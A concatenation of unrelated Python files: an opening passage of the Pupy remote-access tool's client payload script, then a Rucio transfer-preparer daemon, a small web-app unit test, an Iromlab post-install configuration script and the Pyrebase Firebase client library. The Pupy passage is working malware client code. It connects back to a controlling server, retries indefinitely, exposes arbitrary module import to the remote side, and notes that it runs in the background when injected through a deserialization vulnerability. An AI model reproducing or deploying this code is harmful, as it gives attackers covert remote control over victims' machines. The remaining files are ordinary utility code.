"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_json_dumps(self, obj):
return json.dumps(obj)
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
class BindSlaveService(ReverseSlaveService):
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(REVERSE_SLAVE_CONF)
import pupy
try:
from pupy_credentials import BIND_PAYLOADS_PASSWORD
password=BIND_PAYLOADS_PASSWORD
except:
from network.transports import DEFAULT_BIND_PAYLOADS_PASSWORD
password=DEFAULT_BIND_PAYLOADS_PASSWORD
if self._conn.root.get_password() != password:
self._conn.close()
raise KeyboardInterrupt("wrong password")
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
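# Reconnection back-off derived from get_next_wait() below: roughly 0.5-1 s for
# the first 120 attempts, 3-5 s up to attempt 320, then 15-30 s between retries.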
def get_next_wait(attempt):
if attempt<120:
return random.randint(5,10)/10.0
elif attempt<320:
return random.randint(30,50)/10.0
else:
return random.randint(150,300)/10.0
def set_connect_back_host(HOST):
import pupy
pupy.get_connect_back_host=(lambda: HOST)
attempt=0
def main():
global LAUNCHER
global LAUNCHER_ARGS
global attempt
if len(sys.argv)>1:
parser = argparse.ArgumentParser(prog='pp.py', formatter_class=argparse.RawTextHelpFormatter, description="Starts a reverse connection to a Pupy server using the selected launcher\nLast sources: https://github.com/n1nj4sec/pupy\nAuthor: @n1nj4sec (contact@n1nj4.eu)\n")
parser.add_argument('--debug', action='store_true', help="increase verbosity")
parser.add_argument('launcher', choices=[x for x in conf.launchers], help="the launcher to use")
parser.add_argument('launcher_args', nargs=argparse.REMAINDER, help="launcher arguments")
args=parser.parse_args()
if args.debug:
logging.getLogger().setLevel(logging.DEBUG)
LAUNCHER=args.launcher
LAUNCHER_ARGS=shlex.split(' '.join(args.launcher_args))
if not LAUNCHER in conf.launchers:
exit("No such launcher: %s"%LAUNCHER)
if 'get_pupy_config' in pupy.__dict__:
try:
config_file=pupy.get_pupy_config()
exec config_file in globals()
except ImportError:
logging.warning("ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL")
while True:
try:
launcher=conf.launchers[LAUNCHER]()
try:
launcher.parse_args(LAUNCHER_ARGS)
except LauncherError as e:
launcher.arg_parser.print_usage()
exit(str(e))
if getattr(pupy, 'pseudo', False):
set_connect_back_host(launcher.get_host())
else:
pupy.get_connect_back_host=launcher.get_host
pupy.infos['launcher']=LAUNCHER
pupy.infos['launcher_args']=LAUNCHER_ARGS
pupy.infos['launcher_inst']=launcher
pupy.infos['transport']=launcher.get_transport()
rpyc_loop(launcher)
finally:
time.sleep(get_next_wait(attempt))
attempt+=1
def rpyc_loop(launcher):
global attempt
try:
for ret in launcher.iterate():
try:
if type(ret) is tuple: # bind payload
server_class, port, address, authenticator, stream, transport, transport_kwargs = ret
s=server_class(BindSlaveService, port=port, hostname=address, authenticator=authenticator, stream=stream, transport=transport, transport_kwargs=transport_kwargs)
s.start()
else: # connect payload
stream=ret
def check_timeout(event, cb, timeout=60):
time.sleep(timeout)
if not event.is_set():
logging.error("timeout occured !")
cb()
event=threading.Event()
t=threading.Thread(target=check_timeout, args=(event, stream.close))
t.daemon=True
t.start()
try:
conn=rpyc.utils.factory.connect_stream(stream, ReverseSlaveService, {})
finally:
event.set()
attempt=0
conn.serve_all()
except KeyboardInterrupt:
raise
except EOFError:
raise
except SystemExit:
raise
except Exception as e:
logging.error(e)
except EOFError:
print "EOFError received, restarting the connection"
except KeyboardInterrupt:
print "keyboard interrupt raised, restarting the connection"
except SystemExit as e:
logging.error(e)
raise
except Exception as e:
logging.error(traceback.format_exc())
return
if __name__=="__main__":
main()
else:
t=threading.Thread(target=main) # to allow pupy to run in background when imported or injected through a python application exec/deserialization vulnerability
t.daemon=True
t.start()
|
preparer.py
|
# -*- coding: utf-8 -*-
# Copyright 2020-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Thomas Beermann <thomas.beermann@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
import functools
import logging
import threading
from time import time
from typing import TYPE_CHECKING
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.exception import RucioException
from rucio.common.logging import setup_logging
from rucio.core.request import preparer_update_requests, reduce_requests, sort_requests_minimum_distance, \
get_transfertool_filter, get_supported_transfertools, rse_lookup_filter, list_transfer_requests_and_source_replicas
from rucio.daemons.conveyor.common import run_conveyor_daemon
from rucio.db.sqla.constants import RequestState
if TYPE_CHECKING:
from typing import Optional
from sqlalchemy.orm import Session
from rucio.daemons.conveyor.common import HeartbeatHandler
graceful_stop = threading.Event()
def stop():
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1, sleep_time=10, bulk=100):
"""
Running the preparer daemon either once or by default in a loop until stop is called.
"""
setup_logging()
if rucio.db.sqla.util.is_old_db():
raise exception.DatabaseException('Database was not updated, daemon won\'t start')
def preparer_kwargs():
# not sure if this is needed for threading.Thread, but it always returns a fresh dictionary
return {'once': once, 'sleep_time': sleep_time, 'bulk': bulk}
threads = [threading.Thread(target=preparer, name=f'conveyor-preparer-{i}', kwargs=preparer_kwargs(), daemon=True) for i in range(threads)]
for thr in threads:
thr.start()
all_running = True
while all_running:
for thr in threads:
thr.join(timeout=3.14)
if not thr.is_alive() or graceful_stop.is_set():
all_running = False
break
if graceful_stop.is_set() or once:
logging.info('conveyor-preparer: gracefully stopping')
else:
logging.warning('conveyor-preparer: stopping out of the ordinary')
graceful_stop.set()
for thr in threads:
thr.join(timeout=3.14)
logging.info('conveyor-preparer: stopped')
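# Example (hypothetical entry point): a daemon wrapper would typically start the
# loop with run() and later call stop() from a signal handler:
#
#   run(once=False, threads=1, sleep_time=10, bulk=100)
#   # ... elsewhere, e.g. on SIGTERM:
#   stop()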
def preparer(once, sleep_time, bulk, partition_wait_time=10):
    # Make an initial heartbeat so that all instantiated daemons have the correct worker number on the next try
logger_prefix = executable = 'conveyor-preparer'
run_conveyor_daemon(
once=once,
graceful_stop=graceful_stop,
executable=executable,
logger_prefix=logger_prefix,
partition_wait_time=partition_wait_time,
sleep_time=sleep_time,
run_once_fnc=functools.partial(
run_once,
bulk=bulk
),
activities=None,
)
def run_once(bulk: int = 100, heartbeat_handler: "Optional[HeartbeatHandler]" = None, limit: "Optional[int]" = None, session: "Optional[Session]" = None, **kwargs) -> bool:
if heartbeat_handler:
worker_number, total_workers, logger = heartbeat_handler.live()
else:
# This is used in tests
worker_number, total_workers, logger = 0, 0, logging.log
start_time = time()
try:
req_sources = list_transfer_requests_and_source_replicas(
total_workers=total_workers,
worker_number=worker_number,
limit=limit,
request_state=RequestState.PREPARING,
session=session
)
if not req_sources:
count = 0
updated_msg = 'had nothing to do'
else:
transfertool_filter = get_transfertool_filter(lambda rse_id: get_supported_transfertools(rse_id=rse_id, session=session))
requests = reduce_requests(req_sources, [rse_lookup_filter, sort_requests_minimum_distance, transfertool_filter], logger=logger)
count = preparer_update_requests(requests, session=session)
updated_msg = f'updated {count}/{limit} requests'
except RucioException:
logger(logging.ERROR, 'errored with a RucioException, retrying later', exc_info=True)
count = 0
updated_msg = 'errored'
logger(logging.INFO, '%s, taking %.3f seconds' % (updated_msg, time() - start_time))
queue_empty = False
if count < bulk:
queue_empty = True
return queue_empty
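# Example (hypothetical values): tests can drive a single preparer pass directly,
# bypassing the daemon loop and heartbeat handler:
#
#   queue_empty = run_once(bulk=100, limit=10)
#   # True once fewer than `bulk` requests were updated in this pass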
|
simple_tests.py
|
'''
Created on May 31, 2016
@author: yglazner
'''
import unittest
import threading
from cheesyweb import *
import logging
import time
import requests
_app = None
log = logging.getLogger("Logger")
def stop_threaded():
if not _app: return
if _app.running:
_app.stop()
def _run(app):
global _app
_app = app
log.info("Starting %s"%app)
app.start(port=8085)
def run_threaded(app):
threading.Thread(target=_run, args=(app,)).start()
class Test(unittest.TestCase):
def setUp(self):
stop_threaded() #just in case
self.app = App()
self._setup_views()
run_threaded(self.app)
time.sleep(0.2)
def _setup_views(self):
class HelloWorld(View):
title = "hello world"
url = "hello/"
content = Label("Hello world!!!11")
self.app.add(HelloWorld())
def tearDown(self):
stop_threaded()
def testName(self):
        r = requests.get('http://localhost:8085/hello/')
        self.assertEqual(r.status_code, 200)
        self.assertTrue(r.content)
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
logging.basicConfig(level=logging.DEBUG)
unittest.main(argv=['', '-v'])
|
configure.pyw
|
#! /usr/bin/env python
"""Post-install / configuration script for Iromlab"""
import os
import sys
import imp
import site
import sysconfig
from shutil import copyfile
import threading
import logging
import pythoncom
from win32com.client import Dispatch
try:
import tkinter as tk # Python 3.x
import tkinter.scrolledtext as ScrolledText
import tkinter.messagebox as tkMessageBox
except ImportError:
import Tkinter as tk # Python 2.x
import ScrolledText
import tkMessageBox
def errorExit(error):
"""Show error message in messagebox and then exit after userv presses OK"""
tkMessageBox.showerror("Error", error)
os._exit(0)
def get_reg(name, path):
"""Read variable from Windows Registry"""
import winreg
# From http://stackoverflow.com/a/35286642
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
def main_is_frozen():
return (hasattr(sys, "frozen") or # new py2exe
hasattr(sys, "importers") # old py2exe
or imp.is_frozen("__main__")) # tools/freeze
def get_main_dir():
if main_is_frozen():
return os.path.dirname(sys.executable)
return os.path.dirname(sys.argv[0])
def post_install():
"""Install config file + pre-packaged tools to user dir +
Create a Desktop shortcut to the installed software
"""
# This is needed to avoid 'CoInitialize has not been called'
# error with Dispatch. See: https://stackoverflow.com/a/26753031
pythoncom.CoInitialize()
# Package name
packageName = 'iromlab'
# Part 1: install config file
# Locate Windows user directory
userDir = os.path.expanduser('~')
# Config directory
configDirUser = os.path.join(userDir, packageName)
# Create config directory if it doesn't exist
if not os.path.isdir(configDirUser):
logging.info("Creating user configuration directory ...")
try:
os.makedirs(configDirUser)
logging.info("Done!")
except IOError:
msg = 'could not create configuration directory'
errorExit(msg)
# Config file name
configFileUser = os.path.join(configDirUser, 'config.xml')
if not os.path.isfile(configFileUser):
# No config file in user dir, so copy it from location in package.
# Location is /iromlab/conf/config.xml in 'site-packages' directory
# if installed with pip)
logging.info("Copying configuration file to user directory ...")
# Locate site-packages dir (this returns multiple entries)
sitePackageDirs = site.getsitepackages()
# Assumptions: site package dir is called 'site-packages' and is
# unique (?)
for directory in sitePackageDirs:
if 'site-packages' in directory:
sitePackageDir = directory
# Construct path to config file
configFilePackage = os.path.join(sitePackageDir, packageName,
'conf', 'config.xml')
if os.path.isfile(configFilePackage):
try:
copyfile(configFilePackage, configFileUser)
logging.info("Done!")
except IOError:
msg = 'could not copy configuration file to ' + configFileUser
errorExit(msg)
# This should never happen but who knows ...
else:
msg = 'no configuration file found in package'
errorExit(msg)
# Part 2: create Desktop shortcut
logging.info("Creating desktop shortcut ...")
try:
# Scripts directory (location of launcher script)
#scriptsDir = sysconfig.get_path('scripts', 'nt_user')
scriptsDir = get_main_dir()
# Target of shortcut
target = os.path.join(scriptsDir, packageName + '.exe')
# Name of link file
linkName = packageName + '.lnk'
# Read location of Windows desktop folder from registry
regName = 'Desktop'
regPath = r'Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders'
desktopFolder = os.path.normpath(get_reg(regName, regPath))
# Path to location of link file
pathLink = os.path.join(desktopFolder, linkName)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(pathLink)
shortcut.Targetpath = target
shortcut.WorkingDirectory = scriptsDir
shortcut.IconLocation = target
shortcut.save()
logging.info("Done!")
except Exception:
msg = 'Failed to create desktop shortcut'
errorExit(msg)
msg = 'Iromlab configuration completed successfully, click OK to exit!'
tkMessageBox.showinfo("Info", msg)
os._exit(0)
class TextHandler(logging.Handler):
"""This class allows you to log to a Tkinter Text or ScrolledText widget
Adapted from Moshe Kaplan:
https://gist.github.com/moshekaplan/c425f861de7bbf28ef06
"""
def __init__(self, text):
# run the regular Handler __init__
logging.Handler.__init__(self)
# Store a reference to the Text it will log to
self.text = text
def emit(self, record):
msg = self.format(record)
def append():
self.text.configure(state='normal')
self.text.insert(tk.END, msg + '\n')
self.text.configure(state='disabled')
# Autoscroll to the bottom
self.text.yview(tk.END)
# This is necessary because we can't modify the Text from other threads
self.text.after(0, append)
class myGUI(tk.Frame):
"""This class defines the graphical user interface"""
def __init__(self, parent, *args, **kwargs):
tk.Frame.__init__(self, parent, *args, **kwargs)
self.root = parent
self.build_gui()
def build_gui(self):
# Build GUI
self.root.title('Iromlab Configuration Tool')
self.root.option_add('*tearOff', 'FALSE')
self.grid(column=0, row=0, sticky='ew')
self.grid_columnconfigure(0, weight=1, uniform='a')
self.grid_columnconfigure(1, weight=1, uniform='a')
self.grid_columnconfigure(2, weight=1, uniform='a')
self.grid_columnconfigure(3, weight=1, uniform='a')
# Add text widget to display logging info
st = ScrolledText.ScrolledText(self, state='disabled')
st.configure(font='TkFixedFont')
st.grid(column=0, row=1, sticky='w', columnspan=4)
# Create textLogger
text_handler = TextHandler(st)
# Logging configuration
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s')
# Add the handler to logger
logger = logging.getLogger()
logger.addHandler(text_handler)
def main():
"""Main function"""
root = tk.Tk()
myGUI(root)
t1 = threading.Thread(target=post_install, args=[])
t1.start()
root.mainloop()
t1.join()
if __name__ == "__main__":
main()
|
pyrebase.py
|
import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except:
from urllib import urlencode, quote
import json
import math
from random import uniform
import time
from collections import OrderedDict
from sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from gcloud import storage
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import python_jwt as jwt
from Crypto.PublicKey import RSA
import datetime
def initialize_app(config):
return Firebase(config)
class Firebase:
""" Firebase Interface """
def __init__(self, config):
self.api_key = config["apiKey"]
self.auth_domain = config["authDomain"]
self.database_url = config["databaseURL"]
self.storage_bucket = config["storageBucket"]
self.credentials = None
self.requests = requests.Session()
if config.get("serviceAccount"):
scopes = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email',
"https://www.googleapis.com/auth/cloud-platform"
]
service_account_type = type(config["serviceAccount"])
if service_account_type is str:
self.credentials = ServiceAccountCredentials.from_json_keyfile_name(config["serviceAccount"], scopes)
if service_account_type is dict:
self.credentials = ServiceAccountCredentials.from_json_keyfile_dict(config["serviceAccount"], scopes)
if is_appengine_sandbox():
# Fix error in standard GAE environment
            # related to https://github.com/kennethreitz/requests/issues/3187
# ProtocolError('Connection aborted.', error(13, 'Permission denied'))
adapter = appengine.AppEngineAdapter(max_retries=3)
else:
adapter = requests.adapters.HTTPAdapter(max_retries=3)
for scheme in ('http://', 'https://'):
self.requests.mount(scheme, adapter)
def auth(self):
return Auth(self.api_key, self.requests, self.credentials)
def database(self):
return Database(self.credentials, self.api_key, self.database_url, self.requests)
def storage(self):
return Storage(self.credentials, self.storage_bucket, self.requests)
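# Usage sketch (hypothetical config values): the keys below mirror what
# Firebase.__init__ reads from the config dict.
#
#   config = {
#       "apiKey": "...",
#       "authDomain": "example.firebaseapp.com",
#       "databaseURL": "https://example.firebaseio.com",
#       "storageBucket": "example.appspot.com",
#   }
#   firebase = initialize_app(config)
#   auth = firebase.auth()
#   db = firebase.database()
#   storage = firebase.storage()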
class Auth:
""" Authentication Service """
def __init__(self, api_key, requests, credentials):
self.api_key = api_key
self.current_user = None
self.requests = requests
self.credentials = credentials
def sign_in_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def create_custom_token(self, uid, additional_claims=None):
service_account_email = self.credentials.service_account_email
private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
payload = {
"iss": service_account_email,
"sub": service_account_email,
"aud": "https://identitytoolkit.googleapis.com/google.identity.identitytoolkit.v1.IdentityToolkit",
"uid": uid
}
if additional_claims:
payload["claims"] = additional_claims
exp = datetime.timedelta(minutes=60)
return jwt.generate_jwt(payload, private_key, "RS256", exp)
def sign_in_with_custom_token(self, token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/verifyCustomToken?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"returnSecureToken": True, "token": token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def refresh(self, refresh_token):
request_ref = "https://securetoken.googleapis.com/v1/token?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"grantType": "refresh_token", "refreshToken": refresh_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
request_object_json = request_object.json()
# handle weirdly formatted response
user = {
"userId": request_object_json["user_id"],
"idToken": request_object_json["id_token"],
"refreshToken": request_object_json["refresh_token"]
}
return user
def get_account_info(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getAccountInfo?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_email_verification(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def send_password_reset_email(self, email):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def verify_password_reset_code(self, reset_code, new_password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/resetPassword?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
def create_user_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/v3/relyingparty/signupNewUser?key={0}".format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8" }
data = json.dumps({"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(request_ref, headers=headers, data=data)
raise_detailed_error(request_object)
return request_object.json()
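# --- Hedged usage sketch (added for illustration; not part of the original
# module). It chains the e-mail/password endpoints defined above. `auth` is
# assumed to be an instance of the authentication class defined in this file;
# the e-mail and password values are placeholders.
def _example_email_password_flow(auth, email="user@example.com", password="s3cret-pass"):
    """Create an account, send its verification mail, refresh its tokens (sketch)."""
    user = auth.create_user_with_email_and_password(email, password)
    # Ask Firebase to send the verification e-mail for the freshly issued idToken.
    auth.send_email_verification(user["idToken"])
    # ID tokens expire after roughly an hour; exchange the refresh token for new ones.
    refreshed = auth.refresh(user["refreshToken"])
    # Inspect the account with the refreshed idToken.
    return auth.get_account_info(refreshed["idToken"])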
class Database:
""" Database Service """
def __init__(self, credentials, api_key, database_url, requests):
if not database_url.endswith('/'):
url = ''.join([database_url, '/'])
else:
url = database_url
self.credentials = credentials
self.api_key = api_key
self.database_url = url
self.requests = requests
self.path = ""
self.build_query = {}
self.last_push_time = 0
self.last_rand_chars = []
def order_by_key(self):
self.build_query["orderBy"] = "$key"
return self
def order_by_value(self):
self.build_query["orderBy"] = "$value"
return self
def order_by_child(self, order):
self.build_query["orderBy"] = order
return self
def start_at(self, start):
self.build_query["startAt"] = start
return self
def end_at(self, end):
self.build_query["endAt"] = end
return self
def equal_to(self, equal):
self.build_query["equalTo"] = equal
return self
def limit_to_first(self, limit_first):
self.build_query["limitToFirst"] = limit_first
return self
def limit_to_last(self, limit_last):
self.build_query["limitToLast"] = limit_last
return self
def shallow(self):
self.build_query["shallow"] = True
return self
def child(self, *args):
new_path = "/".join([str(arg) for arg in args])
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def build_request_url(self, token):
parameters = {}
if token:
parameters['auth'] = token
for param in list(self.build_query):
if type(self.build_query[param]) is str:
parameters[param] = quote('"' + self.build_query[param] + '"')
elif type(self.build_query[param]) is bool:
parameters[param] = "true" if self.build_query[param] else "false"
else:
parameters[param] = self.build_query[param]
# reset path and build_query for next query
request_ref = '{0}{1}.json?{2}'.format(self.database_url, self.path, urlencode(parameters))
self.path = ""
self.build_query = {}
return request_ref
def build_headers(self, token=None):
headers = {"content-type": "application/json; charset=UTF-8"}
if not token and self.credentials:
access_token = self.credentials.get_access_token().access_token
headers['Authorization'] = 'Bearer ' + access_token
return headers
def get(self, token=None, json_kwargs={}):
build_query = self.build_query
query_key = self.path.split("/")[-1]
request_ref = self.build_request_url(token)
# headers
headers = self.build_headers(token)
# do request
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
request_dict = request_object.json(**json_kwargs)
# if primitive or simple query return
if isinstance(request_dict, list):
return PyreResponse(convert_list_to_pyre(request_dict), query_key)
if not isinstance(request_dict, dict):
return PyreResponse(request_dict, query_key)
if not build_query:
return PyreResponse(convert_to_pyre(request_dict.items()), query_key)
# return keys if shallow
if build_query.get("shallow"):
return PyreResponse(request_dict.keys(), query_key)
# otherwise sort
sorted_response = None
if build_query.get("orderBy"):
if build_query["orderBy"] == "$key":
sorted_response = sorted(request_dict.items(), key=lambda item: item[0])
elif build_query["orderBy"] == "$value":
sorted_response = sorted(request_dict.items(), key=lambda item: item[1])
else:
sorted_response = sorted(request_dict.items(), key=lambda item: item[1][build_query["orderBy"]])
return PyreResponse(convert_to_pyre(sorted_response), query_key)
def push(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.post(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def set(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.put(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def update(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.patch(request_ref, headers=headers, data=json.dumps(data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def remove(self, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.delete(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.json()
def stream(self, stream_handler, token=None, stream_id=None):
request_ref = self.build_request_url(token)
return Stream(request_ref, stream_handler, self.build_headers, stream_id)
def check_token(self, database_url, path, token):
if token:
return '{0}{1}.json?auth={2}'.format(database_url, path, token)
else:
return '{0}{1}.json'.format(database_url, path)
def generate_key(self):
push_chars = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
now = int(time.time() * 1000)
duplicate_time = now == self.last_push_time
self.last_push_time = now
time_stamp_chars = [0] * 8
for i in reversed(range(0, 8)):
time_stamp_chars[i] = push_chars[now % 64]
now = int(math.floor(now / 64))
new_id = "".join(time_stamp_chars)
if not duplicate_time:
for i in range(0, 12):
self.last_rand_chars.append(int(math.floor(uniform(0, 1) * 64)))
        else:
            # Same millisecond as the previous key: re-use the previous random
            # suffix and increment it (reference Firebase push-ID behaviour),
            # carrying over any characters that are already at the maximum.
            i = 11
            while i >= 0 and self.last_rand_chars[i] == 63:
                self.last_rand_chars[i] = 0
                i -= 1
            self.last_rand_chars[i] += 1
for i in range(0, 12):
new_id += push_chars[self.last_rand_chars[i]]
return new_id
def sort(self, origin, by_key):
# unpack pyre objects
pyres = origin.each()
new_list = []
for pyre in pyres:
new_list.append(pyre.item)
# sort
data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key])
return PyreResponse(convert_to_pyre(data), origin.key())
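# --- Hedged usage sketch (added for illustration; not part of the original
# module). It exercises the chainable query builder defined above. `db` is
# assumed to be a Database instance and `token` a valid Firebase idToken;
# the path and field names are placeholders.
def _example_database_queries(db, token=None):
    """Write a record, then read records back ordered and filtered (sketch)."""
    # push() stores the data under an auto-generated key and returns {"name": <key>}.
    pushed = db.child("users").push({"name": "Ada", "score": 42}, token)
    # set()/update()/remove() address a fixed path built with child().
    db.child("users").child(pushed["name"]).update({"score": 43}, token)
    # The builder methods return self, so filters can be chained before get().
    top = db.child("users").order_by_child("score").limit_to_last(10).get(token)
    return pushed["name"], top.val()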
class Storage:
""" Storage Service """
def __init__(self, credentials, storage_bucket, requests):
self.storage_bucket = "https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
self.credentials = credentials
self.requests = requests
self.path = ""
if credentials:
client = storage.Client(credentials=credentials, project=storage_bucket)
self.bucket = client.get_bucket(storage_bucket)
def child(self, *args):
new_path = "/".join(args)
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def put(self, file, token=None):
# reset path
path = self.path
self.path = None
if isinstance(file, str):
file_object = open(file, 'rb')
else:
file_object = file
request_ref = self.storage_bucket + "/o?name={0}".format(path)
if token:
headers = {"Authorization": "Firebase " + token}
request_object = self.requests.post(request_ref, headers=headers, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
elif self.credentials:
blob = self.bucket.blob(path)
if isinstance(file, str):
return blob.upload_from_filename(filename=file)
else:
return blob.upload_from_file(file_obj=file)
else:
request_object = self.requests.post(request_ref, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
def delete(self, name):
self.bucket.delete_blob(name)
def download(self, filename, token=None):
        # remove leading slash from the path
path = self.path
url = self.get_url(token)
self.path = None
if path.startswith('/'):
path = path[1:]
if self.credentials:
blob = self.bucket.get_blob(path)
blob.download_to_filename(filename)
else:
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
def get_url(self, token):
path = self.path
self.path = None
if path.startswith('/'):
path = path[1:]
if token:
return "{0}/o/{1}?alt=media&token={2}".format(self.storage_bucket, quote(path, safe=''), token)
return "{0}/o/{1}?alt=media".format(self.storage_bucket, quote(path, safe=''))
def list_files(self):
return self.bucket.list_blobs()
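# --- Hedged usage sketch (added for illustration; not part of the original
# module). It exercises the Storage helpers above. `storage_service` is
# assumed to be a Storage instance; file names and paths are placeholders and
# `token` (if given) is a Firebase idToken.
def _example_storage_roundtrip(storage_service, token=None):
    """Upload a local file, fetch its download URL, then download it again (sketch)."""
    storage_service.child("images").child("logo.png").put("logo.png", token)
    # child() state is consumed by each call, so rebuild the path per operation.
    url = storage_service.child("images").child("logo.png").get_url(token)
    storage_service.child("images").child("logo.png").download("logo_copy.png", token)
    return url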
def raise_detailed_error(request_object):
try:
request_object.raise_for_status()
except HTTPError as e:
# raise detailed error message
# TODO: Check if we get a { "error" : "Permission denied." } and handle automatically
raise HTTPError(e, request_object.text)
def convert_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre(item))
return pyre_list
def convert_list_to_pyre(items):
    pyre_list = []
    # enumerate() yields the correct index even when the list contains duplicates
    for index, item in enumerate(items):
        pyre_list.append(Pyre([index, item]))
    return pyre_list
class PyreResponse:
def __init__(self, pyres, query_key):
self.pyres = pyres
self.query_key = query_key
def val(self):
if isinstance(self.pyres, list):
# unpack pyres into OrderedDict
pyre_list = []
# if firebase response was a list
if isinstance(self.pyres[0].key(), int):
for pyre in self.pyres:
pyre_list.append(pyre.val())
return pyre_list
# if firebase response was a dict with keys
for pyre in self.pyres:
pyre_list.append((pyre.key(), pyre.val()))
return OrderedDict(pyre_list)
else:
# return primitive or simple query results
return self.pyres
def key(self):
return self.query_key
def each(self):
if isinstance(self.pyres, list):
return self.pyres
class Pyre:
def __init__(self, item):
self.item = item
def val(self):
return self.item[1]
def key(self):
return self.item[0]
class KeepAuthSession(Session):
"""
A session that doesn't drop Authentication on redirects between domains.
"""
def rebuild_auth(self, prepared_request, response):
pass
class ClosableSSEClient(SSEClient):
def __init__(self, *args, **kwargs):
self.should_connect = True
super(ClosableSSEClient, self).__init__(*args, **kwargs)
def _connect(self):
if self.should_connect:
super(ClosableSSEClient, self)._connect()
else:
raise StopIteration()
def close(self):
self.should_connect = False
self.retry = 0
self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
